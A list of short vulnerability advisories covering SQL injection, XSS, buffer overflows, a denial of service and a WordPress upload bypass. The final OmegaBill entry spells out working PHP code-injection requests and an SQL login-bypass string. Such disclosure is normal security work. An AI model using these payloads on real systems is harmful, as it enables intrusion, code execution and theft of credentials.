A buffer overflow vulnerability exists in ProtekResearchLab due to improper bounds checking of user-supplied input. An attacker can send a specially crafted packet to the vulnerable server, resulting in a buffer overflow and potentially allowing arbitrary code execution.
GAzie is prone to a cross-site scripting and an SQL Injection vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Compromising the entire database structure and executing system commands is possible thru malicious SQL queries. The issues exist in the 'login_admin.php' script thru the 'Login' parameter.
Internationalization extension (further is referred as Intl) is a wrapper for ICU library, enabling PHP programmers to perform UCA-conformant collation and date/time/number/currency formatting in their scripts. A vulnerability exists in the grapheme_extract() function which can be exploited to cause a NULL Pointer Dereference. This can be triggered by calling the grapheme_extract() function with a negative value for the size parameter.
When a photo is uploaded, it is only partially validated and it is possible to upload a backdoor on the server hosting WordPress. This backdoor can be called (executed) even if the photo has not been yet approved. When a file is uploaded, its type is validated. Only the following types are accepted: image/jpeg, image/pjpeg, image/gif, image/png, image/x-png. The type is validated by verifying the MIME type of the uploaded file. A navigator infers the MIME type from the file itself or from its extension but it is possible to intercept the HTTP request and change it (using a proxy such as WebScarab). This way, any file can be uploaded as if it were an image. When a photo (an image) is uploaded, its size is checked. If it is too big, it is resized. To avoid this resizing, the uploaded file has to look like a small image.
BWMeter is affected by denial of service vulnerability. Successful exploitation of the vulnerability allows an attacker to crash the vulnerable application, denying service to legitimate users.
Multi Agent System is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Attackers can use a browser to exploit this issue.
Real Estate Single is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Attackers can use a browser to exploit this issue. The following example URI is available: http://www.example.com/resulttype.asp?probe=[Code]
A buffer overflow vulnerability exists in ActFax Server FTP, which could allow an authenticated remote attacker to execute arbitrary code on the vulnerable system. The vulnerability is due to insufficient boundary checks when handling user-supplied input. An attacker can exploit this vulnerability by sending a specially crafted FTP request containing an overly long string. Successful exploitation could result in arbitrary code execution in the context of the application.
The vulnerability exists due to failure in the "/websites.php" script to properly sanitize user-supplied input in "url" variable. Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.
An authentication bypass/SQL injection vulnerability in OmegaBill v1.0 Build 6 can be exploited to retreive a list of usernames and passwords. Vulnerability 1: http://localhost/OmegaBill_v1.0_Build6/clients/download_invoice.php?invoiceid=<?php system("calc.exe"); ?> Vulnerability 2: POST http://localhost/OmegaBill_v1.0_Build6/plugins/dompdf/www/examples.php HTTP/1.1 Host: localhost Connection: keep-alive User-Agent: x Content-Length: 93 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="html" <?php system("calc.exe"); ?> ------x-- SQL Injection: http://localhost/OmegaBill_v1.0_Build6/login.php?username=admin'+or+'1'='1
Services By CQR